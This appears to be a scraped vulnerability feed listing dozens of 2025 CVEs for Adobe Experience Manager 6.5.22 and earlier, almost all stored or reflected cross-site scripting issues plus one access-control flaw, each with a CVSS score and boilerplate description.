Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46964
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46963
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46960
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46957
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46956
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46955
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46954
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46953
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Scope is changed.
Adobe
XSS
Experience Manager
-
CVE-2025-46952
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46951
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46950
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46949
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46948
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46947
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46946
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46945
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46944
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46943
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46942
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46941
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46940
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46939
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46935
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46934
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46933
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46931
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46930
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46929
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46927
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46926
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46924
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46923
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46922
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46920
MEDIUM
CVSS 4.6
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46919
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46918
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46917
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46916
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46915
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46914
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46913
MEDIUM
CVSS 4.8
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46912
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46911
MEDIUM
CVSS 4.8
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46910
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46909
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46908
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46907
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46906
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46905
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46904
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46903
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46902
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46901
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46900
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46899
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46898
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46895
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46894
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46893
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46892
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46891
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46890
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46889
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by an Improper Access Control vulnerability that could result in privilege escalation. A low privileged attacker could leverage this vulnerability to bypass security measures and gain limited unauthorized elevated access. Exploitation of this issue does not require user interaction.
Adobe
Privilege Escalation
Authentication Bypass
Experience Manager
-
CVE-2025-46888
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46887
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46886
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46885
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46884
MEDIUM
CVSS 4.8
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46883
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46882
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46881
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46880
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46879
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46878
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46877
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46876
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46875
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-46874
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-46873
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46872
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46871
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46870
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46866
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46865
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46864
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46863
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46862
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46861
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46860
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46859
MEDIUM
CVSS 5.4
